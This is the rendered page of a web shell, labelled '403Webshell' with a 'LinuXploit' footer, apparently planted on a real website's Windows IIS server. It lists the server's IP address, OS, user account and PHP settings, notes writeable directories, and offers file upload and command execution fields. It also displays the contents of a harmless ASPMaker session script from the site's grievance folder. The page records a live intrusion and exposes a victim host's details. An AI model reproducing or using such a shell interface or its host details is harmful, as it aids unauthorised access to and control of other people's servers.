403Webshell
Server IP : 103.118.17.23  /  Your IP : 216.73.216.169
Web Server : Microsoft-IIS/10.0
System : Windows NT RESELLERPLESK22 10.0 build 20348 (Windows Server 2016) AMD64
User : IWAM_plesk(default) ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/vhosts/mesa.org.in/httpdocs/grievance/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/vhosts/mesa.org.in/httpdocs/grievance/ewsession.asp
<%@ CodePage="65001" %>
<%
Response.Buffer = EW_RESPONSE_BUFFER
%>
<!--#include file="ewcfg.asp"-->
<!--#include file="aspfn.asp"-->
<!--#include file="userfn.asp"-->
<%
Dim csession
Set csession = New cewsession
Call csession.Page_Main
Set csession = Nothing

'
' Page class for session
'
Class cewsession

	' Page ID
	Dim PageID

	' Project ID
	Dim ProjectID

	' Page object name
	Dim PageObjName

	' Page name
	Function PageName()
		PageName = ew_CurrentPage()
	End Function

	' Page URL
	Function PageUrl()
		PageUrl = ew_CurrentPage() & "?"
	End Function

	' Initialize
	Private Sub Class_Initialize()
		PageID = "session"
		ProjectID = "{8003004D-83C2-4A95-B99C-604B4C198F71}"
		PageObjName = "session"
	End Sub

	' Main
	' Uncomment '** for database connectivity / Page_Loading / Page_Unloaded server event
	Sub Page_Main()

		'**Set Conn = ew_GetConn(0)
		' Global Page Loading event (in userfn*.asp)
		'**Call Page_Loading

		Session("EW_LAST_REFRESH_TIME") = ew_StdCurrentDateTime()
		Response.Write ew_CreateToken()

		' Global Page Unloaded event (in userfn*.asp)
		'**Call Page_Unloaded
		' Close connection
		'**Call ew_CloseConn

	End Sub
End Class
%>

Youez - 2016 - github.com/yon3zu
LinuXploit